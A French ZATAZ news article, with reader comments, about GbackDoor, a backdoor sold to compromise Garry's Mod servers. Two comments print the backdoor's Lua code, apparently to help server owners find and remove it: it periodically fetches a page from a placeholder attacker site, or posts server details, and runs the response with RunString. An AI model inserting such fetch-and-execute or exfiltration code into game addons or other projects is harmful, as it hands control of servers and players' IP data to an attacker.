GbackDoor

GbackDoor : le cheval de Troie qui s’attaque aux gamers de Garry’s Mod

Un site web offre la possibilité d’infecter n’importe quel serveur Gmod. Bienvenue dans le monde impitoyable du jeu en ligne.

Dans la série, je fabrique un logiciel espion pour expliquer le danger de ce genre de code, voici venir GbackDoor. Ce « logiciel » a été crée par un internaute du nom de Valtoo16. « Le but est de mettre en garde les fondateurs de serveur Gmod qui ne font pas attention au code qu’ils ajoutent à leur serveur » explique l’auteur de GbackDoor.

Son outil malveillant, une backdoor, permet de récupérer la totalité du fichier cfg/server.cfg. Avec de telles informations, l’utilisateur du cheval de Troie n’a plus qu’à prendre la main sur le serveur ainsi infiltré.

GbackDoor permet aussi de rediriger les joueurs d’un serveur infecté vers un autre serveur gmod. Plus gênant à mon sens, l’outil pirate permet de récupérer l’adresse IP de chaque joueur qui se connecte au serveur gmod infiltré.

Pour rappel, la création, la diffusion, la possession, l’utilisation de ce type de logiciel sont punis par la loi Française et de nombreux autres pays.

Au sujet de l'auteur
Damien Bancal (damienbancal.fr) est un expert internationalement reconnu en cybersécurité. Il a fondé le projet Zataz en 1989. ZATAZ.com est devenu une référence incontournable en matière d'information sur la sécurité informatique et les cybermenaces pour le grand public. Avec plus de 30 ans d'expérience, Damien Bancal s'est imposé comme une figure majeure dans ce domaine, contribuant à la sensibilisation et à la protection des internautes contre les cyberattaques. Sa carrière est marquée par une forte implication dans l'éducation à la cybersécurité, notamment à travers des conférences et des publications spécialisées. Il est l'auteur de plusieurs ouvrages (17) et articles (plusieurs centaines : 01net, Le Monde, France Info, Etc.) qui explorent les divers aspects du piratage informatique et de la protection des données. Il a remporté le prix spécial du livre du FIC/InCyber 2022. Finaliste 2023 du 1er CTF Social Engineering Nord Américain. Vainqueur du CTF Social Engineering 2024 du HackFest 2024 (Canada). Damien Bancal a également été largement reconnu par la presse internationale dont le New York Times, qui souligne non seulement son expertise mais aussi son parcours inspirant. Par exemple, un portrait de La Voix du Nord le décrit comme "Monsieur Cybersécurité", soulignant son influence et son rôle essentiel dans ce domaine. Enfin, il figure parmi les personnalités les plus influentes dans la cybersécurité, comme le souligne Le Big Data, et a été classé parmi les 500 personnalités tech les plus influentes en 2023 selon Tyto PR. Chroniqueur TV et Radio (France Info, M6, RTL, Medi1, Etc.) Volontaires de la réserve citoyenne - Gendarmerie Nationale et de l'Éducation Nationale. Médaillé de la DefNat (Marine Nationale) et de la MSV (Gendarmerie Nationale). Entrepreneur, il a lancé en 2022 la société veillezataz.com.

Articles connexes

  1. Hugo Reply

    il faut effectivement redoubler de vigilance en ce moment …

  2. Hugo Reply

    vraiment fourbe ce cheval de troie…

  3. George Reply

    Alors vous vous êtes marrant les fondateurs de serveurs n’ont qu’a acheter directement leurs addons sur gmodstore et non de les télécharger illégalement sur des sites de Leak c’est une bonne façon de les punir pour rappel les addons sont une propriété intellectuelle donc les télécharger sans les payées n’est pas légal.

  4. Nestor Reply

    Gbackdoor n’as pas été créer par Valtoo16 mais par Marbella et Theorywrong, d’ailleurs la source de gbackdoor est trouvable sur le web. Valtoo16 a seulement pris le code source et changer quelque page/code/design.

  5. WhileTrue Reply

    C’est ce qu’on appelle faire tempête dans un verre d’eau.
    Ce soit-disant logiciel n’a rien d’exceptionnel, ce ne sont que trois lignes de codes cachées dans un script.

    Certains points sont quand même à corriger.

    Premièrement,
    Sauf utilisation de modules, les scripts LUA n’ont pas le droit de lecture/écriture sur les fichiers .cfg de plus, il est impossible d’écrire en dehors du dossier DATA. Il est donc complètement faux d’affirmer que le « logiciel » est capable de voler le contenu du fichier server.cfg.

    Deuxièmement,
    L’agent malicieux qu’on retrouve sur une machine infectée n’est autre qu’une requête HTTP (exécutée à intervalle régulier) qui exécute le contenu d’une page dont le « hackeur » est le propriétaire.
    Cela ressemble à cela :
    http.Fetch(« site-du-hackeur[POINT]com/core/stage1.php »,
    function(body)
    RunString(b)
    end
    end)

    Troisièmement,
    L’auteur du panneau de contrôle (parce qu’il ne s’agit rien de plus que çà) n’est pas Valtoo16. Valtoo16 est connu pour avoir acheté des scripts, pour ensuite les modifier puis les infecter avec cette backdoor. Au delà d’utiliser des logiciels tout faits, il n’a aucune compétence dans le domaine.

    Enfin, il n’y a aucun risque quant à la sécurité de la machine hôte du serveur GMod, il suffit de supprimer les lignes de code malveillantes pour être débarrassé du soit-disant cheval de Troie.

  6. Dojlo Reply

    Alor allez dans votre addons lua>autorun et chercher un dossier lua avec

    timer.Create(« _________ », 5, 0, function() local a = { n = GetHostName(), nb = tostring(#player.GetAll()), i = game.GetIPAddress() } http.Post( « ___________ », a, function( body, len, headers, code ) RunString(body) end) end)

    suprimer le

  7. RACH77 Reply

    Merci pour ces infos.
    Cela me permet d’avoir un début d’analyse, ou je dirais plutôt un départ d’analyse  » Backdoor ».
    Ont ma filer un ligne de commande, qui ma rebooter mon serveur.
    Je voudrais savoir à quoi sert cette ligne de commande ? Et peut elle m’aider à me proteger.
    Voici cette ligne:
    ulx luarun util. [xxxx] end)

    • Damien Bancal Reply

      Bonjour,
      Cette ligne n’est pas votre amie 🙂

Laisser un commentaire

*

Ce site utilise Akismet pour réduire les indésirables. En savoir plus sur comment les données de vos commentaires sont utilisées.